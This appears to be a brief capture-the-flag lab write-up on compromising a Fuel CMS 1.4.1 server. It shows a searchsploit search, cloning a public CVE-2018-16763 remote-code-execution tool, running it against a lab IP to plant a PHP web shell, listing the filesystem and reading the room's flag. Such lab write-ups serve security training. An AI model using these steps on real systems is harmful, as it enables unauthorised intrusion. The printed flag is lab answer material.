Web

Searchsploit

┌──(kali㉿kali)-[~]
└─$ searchsploit fuel
------------------------------------------- ---------------------------------
 Exploit Title                             |  Path
------------------------------------------- ---------------------------------
AMD Fuel Service - 'Fuel.service' Unquote  | windows/local/49535.txt
Franklin Fueling Systems  TS-550 - Exploit | hardware/remote/51321.txt
Franklin Fueling Systems Colibri Controlle | linux/remote/50861.txt
Franklin Fueling Systems TS-550 - Default  | hardware/remote/51382.txt
Franklin Fueling TS-550 evo 2.0.0.6833 - M | hardware/webapps/31180.txt
fuel CMS 1.4.1 - Remote Code Execution (1) | linux/webapps/47138.py
Fuel CMS 1.4.1 - Remote Code Execution (2) | php/webapps/49487.rb
Fuel CMS 1.4.1 - Remote Code Execution (3) | php/webapps/50477.py
Fuel CMS 1.4.13 - 'col' Blind SQL Injectio | php/webapps/50523.txt
Fuel CMS 1.4.7 - 'col' SQL Injection (Auth | php/webapps/48741.txt
Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Inj | php/webapps/48778.txt
Fuel CMS 1.5.0 - Cross-Site Request Forger | php/webapps/50884.txt
------------------------------------------- ---------------------------------
Shellcodes: No Results

Exploit

┌──(kali㉿kali)-[~/Documents]
└─$ git clone https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE.git
Cloning into 'CVE-2018-16763-FuelCMS-1.4.1-RCE'...
remote: Enumerating objects: 23, done.
remote: Counting objects: 100% (23/23), done.
remote: Compressing objects: 100% (19/19), done.
remote: Total 23 (delta 4), reused 22 (delta 3), pack-reused 0 (from 0)
Receiving objects: 100% (23/23), 544.59 KiB | 2.13 MiB/s, done.
Resolving deltas: 100% (4/4), done.

┌──(kali㉿kali)-[~/Documents/CVE-2018-16763-FuelCMS-1.4.1-RCE]
└─$ python3 console.py -t 10.201.39.33
CVE-2018-16763-FuelCMS-1.4.1-RCE - by Remi GASCOU (Podalirius)

[+] Shell was uploaded in http://10.201.39.33/9b6e416e57d4496eb8b2e9770a403e9f.php
[webshell]> ls
bin
boot
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var

[webshell]> cat home/ubuntu/flag.txt
THM{ACKME_BLOG_HACKED}